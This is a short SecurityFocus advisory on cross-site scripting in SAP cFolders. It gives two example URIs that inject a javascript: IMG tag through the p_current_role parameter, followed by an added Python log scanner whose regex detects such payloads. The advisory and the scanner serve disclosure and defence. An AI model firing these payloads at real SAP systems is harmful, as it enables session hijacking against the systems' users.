SAP cFolders Cross Site Scripting And HTML Injection Vulnerabilities

Attackers can use a browser to exploit these issues. To exploit a cross-site scripting issue, an attacker must entice an unsuspecting user to follow a malicious URI.

The following example URIs are available:

https://www.example.com/sap/bc/bsp/sap/cfx_rfc_ui/col_table_filter.htm?p_current_role=aaaaaaaa<IMG/SRC=JaVaScRiPt:alert('DSECRG')>

https://www.example.com/sap/bc/bsp/sap/cfx_rfc_ui/me_ov.htm?p_current_role=aaaaaaaa<IMG/SRC=JaVaScRiPt:alert('DSECRG')>
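For defenders reviewing web server logs, the following added example (not part of the original advisory) flags requests to the cfx_rfc_ui pages whose p_current_role value carries markup or a script scheme. It assumes Common Log Format access logs and that a legitimate role value never contains such characters; the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Path prefix and parameter name taken from the example URIs on this page.
CFX_PREFIX = "/sap/bc/bsp/sap/cfx_rfc_ui/"
PARAM = "p_current_role"
# Assumption: a role value never legitimately contains markup or a script scheme.
SUSPICIOUS = re.compile(r"[<>\"']|javascript\s*:", re.IGNORECASE)
# Request field of a Common Log Format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /sap/bc/bsp/sap/cfx_rfc_ui/col_table_filter.htm?p_current_role=ADMIN HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2010:10:01:00 +0000] "GET /sap/bc/bsp/sap/cfx_rfc_ui/me_ov.htm?p_current_role=aaaaaaaa%3CIMG/SRC=JaVaScRiPt:alert(%27DSECRG%27)%3E HTTP/1.1" 200 4821',
    '192.0.2.12 - - [01/Jan/2010:10:02:00 +0000] "GET /sap/bc/bsp/sap/cfx_rfc_ui/col_table_filter.htm?p_current_role=x%253Cb%253E HTTP/1.1" 200 5130',
    '192.0.2.13 - - [01/Jan/2010:10:03:00 +0000] "GET /index.html?q=%3Cb%3E HTTP/1.1" 200 900',
]

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_request(target):
    """True if the request targets a cfx_rfc_ui page with a suspicious role value."""
    parts = urlsplit(target)
    if not parts.path.lower().startswith(CFX_PREFIX):
        return False
    # parse_qsl decodes once; fully_decode handles any further encoding layers.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() == PARAM and SUSPICIOUS.search(fully_decode(value)):
            return True
    return False

def scan(lines):
    """Return the log lines whose request target is flagged."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if match and flag_request(match.group(1)):
            hits.append(line)
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```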


 

Copyright 2010, SecurityFocus